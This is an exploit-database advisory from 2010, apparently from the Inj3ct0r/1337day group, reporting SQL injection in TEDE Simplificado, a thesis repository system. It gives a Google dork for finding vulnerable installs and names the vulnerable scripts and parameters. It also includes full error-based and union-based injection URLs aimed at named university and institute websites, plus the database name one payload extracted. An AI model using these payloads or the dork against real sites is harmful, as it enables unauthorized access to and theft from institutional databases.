TEDE Simplificado suffers from a remote SQL injection vulnerability.
c148c4dce5c6ae52ae9e65cbb1316ecb7570f99ad94c9801d33afb3361aaa675
======================================================
TEDE Simplificado <= (Versions) SQL Injection Vulns
======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3 3
3 _ __ __ ________ __ __ 3
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1
3 >> Exploit database separated by exploit 3
3 type (local, remote, DoS, etc.) 3
7 7
1 [+] Site : 1337db.com 1
3 [+] Support e-mail : submit[at]1337db.com 3
3 3
7 ############################################ 7
1 I'm KnocKout 1337 Member from 1337 DataBase 1
3 ############################################ 3
3 3
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : Kalashinkov3 <= :)
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : desenvolvido
|~Price : N/A
|~Version : N/A
|~Software: http://www.ibict.br/
|~Vulnerability Style : SQL Injection
|~Vulnerability Dir : /
|~sqL : MysqL
|~Google DORK : inurl:/tde_busca/
-- Good.:)
|[~]Date : "26.11.2010"
|[~]Tested on : Demo's
Apache
MySQL >=4.1
MySQL >=5
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
processaPesquisa.php
tde_fut.php Files Not Sec.
http://Target/tde_busca/processaPesquisa.php?pesqExecutada={ID]&id={ID} SQL Inject!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
For Version : v-IBICT -
http://tede.ibict.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663 {SQL]
http://tede.ibict.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
MYSQL WRÝTES : Query failed (autor): Duplicate entry '~'TDE'~1' for key 1
Database Found : TGE
To be continue!
For Version : v1.01
http://etd.uns.edu.ar/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4
For Version : vS2.04
http://www.bdtd.ndc.uff.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=2951%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
=============================================================
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Was Here.
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....